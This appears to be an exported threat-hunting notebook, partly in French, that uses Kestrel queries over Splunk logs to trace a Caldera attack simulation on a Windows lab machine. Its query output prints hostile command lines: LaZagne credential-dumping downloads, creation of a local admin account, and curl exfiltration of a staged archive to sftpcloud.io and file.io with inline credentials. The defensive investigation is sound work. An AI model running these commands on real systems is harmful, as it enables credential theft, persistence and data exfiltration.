## Mise en contexte

### 10.0.0.5
- **OS**: Windows 10
- **Type**: PC d'un employé
- **Services activés** :
  - Bureau à distance Windows et gestion à distance
- **Source de données**:
  - [Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) -> [Splunk Enterprise](https://www.splunk.com/en_us/products/splunk-enterprise.html)
  - Source de données est accessible par le biais de [stix-shifter](https://github.com/opencybersecurityalliance/stix-shifter)
  - Données partielles extraites pour cette démonstration
- **Nom du profil stix-shifter**: `splunk`

### 10.0.0.4
- **OS**: Ubuntu 24.04 LTS
- **Type**: Serveur de commandement Caldera

### 192.168.1.4
- **OS**: Fedora 38
- **Type**: SIEM pour la collecte des journaux
- **Services activés** :
	- stix-shifter
	- stix2 Python Library
	- taxii2client Python Library
	- Arango TAXII Server
	- ArangoDB Community Edition
	- Kestrel
	- Jupyter

## Par où commencer ?

Qu'en est-il des TTP spécifiés dans [MITRE](https://mitre.org) [CALDERA](https://caldera.mitre.org/)?

![Caldera Image](./CalderaImage.png)

In [9]:
# TTP: System Network Configuration Discovery (T1016)
t1016_instances = GET process
                  FROM stixshifter://splunk
                  WHERE name = 'cmd.exe' AND (command_line LIKE '%netsh%' OR command_line LIKE '%ipconfig%' OR command_line LIKE '%arp%')
                  START 2024-12-01T00:00:00Z STOP 2024-12-24T00:00:00Z
                     
DISP t1016_instances ATTR pid, name, command_line



pid,name,command_line
9636,cmd.exe,cmd.exe /C ipconfig /all &amp;&amp; netsh interface show interface &amp;&amp; arp -a &amp;&amp; nbtstat -n &amp;&amp; net config
9416,cmd.exe,"""C:\Windows\system32\cmd.exe"" /c ""C:\Users\inf808\AppData\Local\inf808\SharpShares.exe"" /ldap:all"

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,process*,user-account*,x-oca-asset*,x-oca-event*,x-splunk-data*
t1016_instances,process,2,12,144,144,432,286,144,144,144,144


In [10]:
# TTP: Discover antivirus programs (T1518.001)
# CALDERA command on Windows: `wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value`
t1518_instances = GET process
                  FROM stixshifter://splunk
                  WHERE command_line LIKE '%AntiVirusProduct%'
                  START 2024-12-01T00:00:00Z STOP 2024-12-24T00:00:00Z
                     
DISP t1518_instances ATTR pid, name, command_line



pid,name,command_line
3132,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value"""
11532,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$NameSpace = Get-WmiObject -Namespace \""root\"" -Class \""__Namespace\"" | Select Name | Out-String -Stream | Select-String \""SecurityCenter\"";\$SecurityCenter = \$NameSpace | Select-Object -First 1;Get-WmiObject -Namespace \""root\\$SecurityCenter\"" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;"""
10180,WMIC.exe,"""C:\Windows\System32\Wbem\WMIC.exe"" /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value"

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,process*,user-account*,x-oca-asset*,x-oca-event*,x-splunk-data*
t1518_instances,process,3,8,8,8,22,11,8,8,8,8


In [222]:
nt = GET network-traffic
     FROM stixshifter://splunk
     WHERE dst_ref.value NOT LIKE '10.%' AND dst_port = '443' AND network-traffic:protocols[*] = 'ip'
     LAST 15 DAYS
     
# this command should return an interactive map with IPs pinned on the map
APPLY docker://pinip ON nt



VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
nt,network-traffic,15,914,8480,4917,444,16261,5346,1060,3121,11544,8471,40,8480,8480,216,8480


In [214]:
nt = GET network-traffic
     FROM stixshifter://splunk
     WHERE dst_ref.value NOT LIKE '10.%' AND dst_port = '443' AND network-traffic:protocols[*] = 'ip'
     LAST 15 DAYS
     
# A domain name lookup analytics:
# a new attribute "x_domain_name" is added to the input variable for its dest IPs
APPLY docker://domainnamelookup ON nt
#  x_domain_name and x_domain_organization are new attributes added by the analytics, show the new fields
DISP nt ATTR src_ref.value, src_port, dst_ref.value, dst_port, x_domain_name, x_domain_organization

ips = FIND ipv4-addr LINKED nt WHERE value != '10.0.0.5'

procs = FIND process CREATED nt
        WHERE x-oca-asset:hostname = 'WindowsTarget' # the added WHERE clause limits the search to be performed against endpoint 'WindowsTarget' 
        DISP procs ATTR x_original_file_name, command_line
    
users = FIND user-account OWNED procs
        DISP users ATTR user_id

# find malicious executable files
files = FIND file LINKED procs
DISP files ATTR name, parent_directory_ref.path



src_ref.value,src_port,dst_ref.value,dst_port,x_domain_name,x_domain_organization
10.0.0.5,54045,140.82.114.3,443,lb-140-82-114-3-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54046,185.199.111.133,443,cdn-185-199-111-133.github.com,"GitHub, Inc"
10.0.0.5,54701,185.199.111.154,443,cdn-185-199-111-154.github.com,"GitHub, Inc"
10.0.0.5,54915,140.82.114.3,443,lb-140-82-114-3-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54268,140.82.114.4,443,lb-140-82-114-4-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54697,140.82.112.4,443,lb-140-82-112-4-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54702,185.199.111.154,443,cdn-185-199-111-154.github.com,"GitHub, Inc"
10.0.0.5,54851,140.82.114.3,443,lb-140-82-114-3-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54734,140.82.112.4,443,lb-140-82-112-4-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54493,140.82.112.4,443,lb-140-82-112-4-iad.github.com,"GitHub, Inc. (GITHU)"

x_original_file_name,command_line
PowerShell.EXE,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"""
PowerShell.EXE,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";Invoke-WebRequest \""https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe\"" -OutFile \""\$StageDir\LaZagne.exe\"";cmd /c \""\$StageDir\LaZagne.exe browsers &gt; \""\$StageDir\T1555003LaZagne_output.txt\""\"""""
PowerShell.EXE,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";Invoke-WebRequest \""https://github.com/mitchmoser/SharpShares/releases/download/v2.4/SharpShares.exe\"" -OutFile \""\$StageDir\SharpShares.exe\"";cmd /c `\""\$StageDir\SharpShares.exe`\"" /ldap:all | out-file -filepath \""\$StageDir\T1135SharpSharesOutput.txt\"""""

name,parent_directory_ref.path
powershell.exe,
powershell.exe,C:\Windows\System32\WindowsPowerShell\v1.0
Syscall.exe,
__PSScriptPolicyTest_zkwcrvyn.awj.ps1,
explorer.exe,
LaZagne.exe,
__PSScriptPolicyTest_nbbosa4w.b2j.ps1,
splunkd.exe,
SharpShares.exe,
__PSScriptPolicyTest_fiwdnd5r.xzv.ps1,

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
nt,network-traffic,15,816,6338,3385,382,11772,4718,929,2763,8467,6338,25,6338,6338,90,6338
ips,ipv4-addr,6,831,6338,3385,382,11772,4712,929,2778,8467,6338,25,6338,6338,90,6338
procs,process,4,2016,29967,22383,670,67416,11702,1469,6792,45685,29967,205,29967,29967,414,29967
users,user-account,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
files,file,11,22969,30383,22783,686,68573,11702,1517,6808,46457,30383,205,30383,30383,414,30383


### Investigation Context: Suspicious Command-Line Activity

During the investigation, we identified some suspicious command-line activity based on the process data analyzed. The following details highlight the processes with potentially malicious or unauthorized actions.

#### Analytical Insights

- The **cmd.exe** command is highly suspicious, as it directly manipulates system user accounts and group memberships. The command line indicates an attempt to create a new user (`Alex`) with the password `coucou`, and then add the user to the `administrators` group. This is a clear indicator of an attacker creating a **local admin user** for **persistence** on the compromised system.

In [42]:
# A suspicious process scoring analytics. 
#Calculates a "suspicious score" for processes based on activity types (e.g., writing to system directory, network connections, forking processes, and suspicious commands), to help prioritize investigations by ranking processes in Kestrel.
# a new attribute "x_suspiciousness" is added to the input variable
procs = GET process FROM stixshifter://splunk 
WHERE [process:binary_ref.name MATCHES '.+\.(exe|dll|bat)$' AND process:binary_ref.name != 'powershell.exe'] START t'2024-12-01T00:00:00Z' STOP t'2024-12-24T00:00:00Z'

APPLY docker://susp_scoring ON procs

# sort the processes
procs_desc = SORT procs BY x_suspicious_score DESC
# get the most suspicous ones
procs_sus = GET process FROM procs WHERE x_suspicious_score > 0.9
DISP procs_sus ATTR name, command_line, x_suspicious_score



name,command_line,x_suspicious_score
cmd.exe,"cmd.exe /C net user /add ""Alex"" ""coucou"" &amp;&amp; net localgroup administrators ""Alex"" /add",2
whoami.exe,"""C:\Windows\system32\whoami.exe""",1

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
procs,process,325,20678,22117,17379,294,50914,7168,453,4025,33858,22117,180,22117,22117,396,22117
procs_desc,process,325,20678,0,0,0,0,0,0,0,0,0,0,0,0,0,0
procs_sus,process,2,76,0,0,0,0,0,0,0,0,0,0,0,0,0,0


In [221]:
users = GET user-account
FROM stixshifter://splunk
WHERE (user_id != "SYSTEM" AND user_id != "inf808" AND user_id != "WDAGUtilityAccount" AND user_id != "DefaultAccount"  AND user_id != "Guest") 
START 2024-12-01T15:05:00Z STOP 2024-12-24T08:00:00Z
DISP users ATTR account_login, user_id, id



account_login,user_id,id
,WindowsTarget\$,user-account--33ef3d36-6196-5d15-98e0-21f30495198e
,administrator,user-account--363f010b-1538-5356-915b-6bfee164d94f
,Alex,user-account--75f957b2-1c87-55dc-be2d-a8c656b61cff
'S-1-5-18',NETWORK SERVICE,user-account--cf862b07-072e-51d7-ada6-d1b5b424bd80

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
users,user-account,4,1756,28583,21260,432,63483,11128,750,6151,43095,28570,220,28583,28583,636,28583


### Caldera Simulation: Downloading Malicious Tools from GitHub

In our Caldera simulation, Caldera commands were executed to download malicious tools from GitHub using PowerShell. The `Invoke-WebRequest` cmdlet was used to download the malicious executable (`SharpShares.exe`). These files were saved in a hidden directory at `C:\Users\$username\AppData\Local\$username`, where `$username` is the current user's name. Once downloaded, the tool was executed, and its output was redirected to a file (`T1135SharpSharesOutput.txt`) for exfiltration.

### Traffic Analysis

As part of the analysis, a time-series chart of web traffic was generated, revealing a notable spike in outbound traffic at a specific time. This spike corresponds to the period when the malicious tool was downloaded, indicating that the malicious activity occurred during this time. The chart visually supports the hypothesis that the malicious tool was fetched from an external source and exfiltrated through the network, aligning with the observed traffic anomaly.

In [223]:
conns_all = GET network-traffic
     FROM stixshifter://splunk
     WHERE dst_ref.value NOT LIKE '10.%' AND dst_port = '443' AND network-traffic:protocols[*] = 'ip'
     LAST 15 DAYS
     
# conns_all are network-traffic entities without timestamps. Get records of them with timestamps.
# More info: https://kestrel.readthedocs.io/en/latest/language.html#timestamped
conns_ts = TIMESTAMPED(conns_all)
        
APPLY python://attribute-plot ON conns_ts WITH XPARAM=first_observed, YPARAM=id



VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
conns_all,network-traffic,15,929,8495,4917,444,16276,5376,1060,3136,11559,8486,40,8495,8495,216,8495
conns_ts,network-traffic,929,76895,0,0,0,0,0,0,0,0,0,0,0,0,0,0


In [224]:
# Fetch processes from the last 10 days where the command line contains 'StageDir'
procs_exfil = GET process FROM "stixshifter://splunk" WHERE command_line LIKE '%StageDir%' LAST 10 DAYS

DISP procs_exfil ATTR pid, command_line

# Find parent processes of the processes in procs_exfil
parent_procs_exfil = FIND process CREATED procs_exfil

# Group parent processes by their name and display them
# The result here is the Sandcat agent executable file for the C2 channel with the Caldera server.
# Next, we will investigate further along the kill chain, focusing on the stages leading up to the exfiltration destination.
aggr = GROUP parent_procs_exfil BY name
DISP aggr ATTR unique_name, unique_pid, unique_command_line

# Find network-traffic associated with processes in procs_exfil
nt_exfil = FIND network-traffic CREATED BY procs_exfil

nt_exfil_ts = TIMESTAMPED(nt_exfil)

DISP nt_exfil_ts ATTR protocols, src_ref.value, src_port, dst_ref.value, dst_port

# Bar plot showing traffic direction for malicious download of files from github
APPLY python://attribute-plot ON nt_exfil_ts WITH XPARAM=x_direction



pid,command_line
11972,"powershell.exe -ExecutionPolicy Bypass -C ""remove-item \""\$StageDir\T1135SharpSharesOutput.txt\"" -force -erroraction silentlycontinue"""
2400,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";&amp; \""C:\Program Files\7-Zip\7z.exe\"" a \""\$StageDir\StagedFiles.7z\"" \""\$StageDir\*\"" \""-p password\"" | Out-Null;sleep 1;ls \""\$StageDir\StagedFiles.7z\"" | foreach {\$_.FullName} | select"""
10624,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";Invoke-WebRequest \""https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe\"" -OutFile \""\$StageDir\LaZagne.exe\"";cmd /c \""\$StageDir\LaZagne.exe browsers &gt; \""\$StageDir\T1555003LaZagne_output.txt\""\"""""
8836,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";Invoke-WebRequest \""https://github.com/mitchmoser/SharpShares/releases/download/v2.4/SharpShares.exe\"" -OutFile \""\$StageDir\SharpShares.exe\"";cmd /c `\""\$StageDir\SharpShares.exe`\"" /ldap:all | out-file -filepath \""\$StageDir\T1135SharpSharesOutput.txt\"""""

name,unique_pid,unique_name,unique_binary_ref,unique_x_unique_id,unique_command_line,unique_parent_ref,unique_x_original_file_name,mean_x_suspicious_score,mean_cluster,unique_x_psd_deobfuscated
splunkd.exe,1,1,2,1,1,0,0,0.0,0.0,0

protocols,src_ref.value,src_port,dst_ref.value,dst_port
"[""ip"",""tcp""]",10.0.0.5,54269,185.199.111.133,443
"[""ip"",""tcp""]",10.0.0.5,54268,140.82.114.4,443
"[""ip"",""tcp""]",10.0.0.5,54494,185.199.108.133,443
"[""ip"",""tcp""]",10.0.0.5,54493,140.82.112.4,443

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
procs_exfil,process,4,2249,32535,24293,752,73027,12380,1664,7198,49506,32526,220,32535,32535,540,32535
parent_procs_exfil,process,22,3311,32335,24421,752,73083,11724,1664,6870,49416,32326,220,32335,32335,540,32335
aggr,process,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0
nt_exfil,network-traffic,4,480,8516,4930,448,16317,5384,1070,3155,11587,8507,40,8516,8516,216,8516
nt_exfil_ts,network-traffic,480,57616,0,0,0,0,0,0,0,0,0,0,0,0,0,0


### Pre-Stage Phase Related to Data Exfiltration

During the pre-stage phase related to data exfiltration, we simulated the creation of a staging directory at the path `C:\Users\inf808\AppData\Local\staged_files` and placed multiple dumps of credential files there. Once ready, the data was packaged (e.g., compressed into a `.7z` archive) and exfiltrated using two distinct methods:
- **File transfer protocols (sftpcloud.io)**
- **Cloud storage (file.io)**

In [191]:
exfil_cmd = GET process FROM stixshifter://splunk
WHERE command_line LIKE '%StagedFiles.7z%'
LAST 15 DAYS
# display the timestamps from observations of those processes
DISP TIMESTAMPED(exfil_cmd) ATTR pid, name, command_line



first_observed,pid,name,command_line
2024-12-12T16:43:24.000Z,10504,curl.exe,"""C:\Windows\System32\curl.exe"" -T C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z ftp://534c18bc0cab45b996304dc32ffbf4cf:nwg22fYoW5qE9ZApcEYZWU6pmJ1Q8OHh@eu-central-1.sftpcloud.io"
2024-12-12T16:43:24.000Z,3320,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$zipFilePath = \""C:\Users\\$username\AppData\Local\\$username\StagedFiles.7z\"";&amp; \""C:\Windows\System32\curl.exe\"" -T \""\$zipFilePath\"" \""ftp://534c18bc0cab45b996304dc32ffbf4cf:nwg22fYoW5qE9ZApcEYZWU6pmJ1Q8OHh@eu-central-1.sftpcloud.io\"";Start-Sleep -Seconds 2;"""
2024-12-12T17:01:24.000Z,1304,7z.exe,"""C:\Program Files\7-Zip\7z.exe"" a C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z C:\Users\inf808\AppData\Local\inf808\* ""-p password"""
2024-12-12T17:01:24.000Z,2400,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";&amp; \""C:\Program Files\7-Zip\7z.exe\"" a \""\$StageDir\StagedFiles.7z\"" \""\$StageDir\*\"" \""-p password\"" | Out-Null;sleep 1;ls \""\$StageDir\StagedFiles.7z\"" | foreach {\$_.FullName} | select"""
2024-12-12T17:02:15.000Z,2688,cmd.exe,"cmd.exe /C set username=%%USERNAME%%cd /d C:\Users\%%username%%\AppData\Local\%%username%%C:\Windows\System32\Curl.exe -k -F ""file=@StagedFiles.7z"" https://file.io/"
2024-12-12T17:03:01.000Z,6764,curl.exe,"""C:\Windows\System32\curl.exe"" -T C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z ftp://d9ed88e510ee4b82a05af32f15e571a5:v9Nbr0klPEwzie09OGLYZoAj2C4hYTUn@eu-central-1.sftpcloud.io"
2024-12-12T17:03:01.000Z,2692,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$zipFilePath = \""C:\Users\\$username\AppData\Local\\$username\StagedFiles.7z\"";&amp; \""C:\Windows\System32\curl.exe\"" -T \""\$zipFilePath\"" \""ftp://d9ed88e510ee4b82a05af32f15e571a5:v9Nbr0klPEwzie09OGLYZoAj2C4hYTUn@eu-central-1.sftpcloud.io\"";Start-Sleep -Seconds 2;"""
2024-12-12T17:03:03.000Z,6764,curl.exe,"""C:\Windows\System32\curl.exe"" -T C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z ftp://d9ed88e510ee4b82a05af32f15e571a5:v9Nbr0klPEwzie09OGLYZoAj2C4hYTUn@eu-central-1.sftpcloud.io"

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
exfil_cmd,process,7,1085,28529,22564,634,66346,8558,1365,5173,44431,28529,205,28529,28529,414,28529
